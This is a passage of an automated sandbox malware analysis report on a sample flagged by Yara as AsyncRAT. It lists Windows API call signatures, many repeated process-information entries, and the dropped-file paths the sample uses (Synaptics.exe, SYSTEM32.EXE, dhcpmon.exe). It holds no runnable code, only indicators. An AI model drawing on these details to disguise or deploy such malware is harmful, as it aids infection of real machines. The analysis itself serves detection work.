            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,4_2_0045A104
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0042C6FC IsIconic,GetWindowPlacement,GetWindowRect,4_2_0042C6FC
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0044083C IsIconic,GetCapture,4_2_0044083C
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0045695C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,4_2_0045695C
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_004410F0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,4_2_004410F0
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_00459934 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,9_2_00459934
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_0045A054 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,9_2_0045A054
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_0045A104 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,9_2_0045A104
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_0042C6FC IsIconic,GetWindowPlacement,GetWindowRect,9_2_0042C6FC
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_0044083C IsIconic,GetCapture,9_2_0044083C
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_0045695C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,9_2_0045695C
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_004410F0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,9_2_004410F0
            Source: C:\Users\user\Desktop\WINDOWS.EXECode function: 9_2_00441A14 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,9_2_00441A14
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeCode function: 4_2_0042E3B4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_0042E3B4
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\._cache_y8kdmHi6x3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SYSTEM32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\WINDOWS.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Yara detected AsyncRAT
            Source: Yara matchFile source: 15.2.Synaptics.exe.4ebff6c.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.Synaptics.exe.46dff6c.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.0.SYSTEM32.EXE.da0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45fff6c.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4c4d1c.17.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.4c4d1c.23.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cb40a4.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.4c4d1c.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.Synaptics.exe.4cbff6c.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.y8kdmHi6x3.exe.4b8e54.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 20.0.Synaptics.exe.4b8e54.28.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.2.Synaptics.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.y8kdmHi6x3.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 21.0.Synaptics.exe.4b8e54.24.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.y8kdmHi6x3.exe.45f40a4.4.unpack, type: UNPACKEDPE
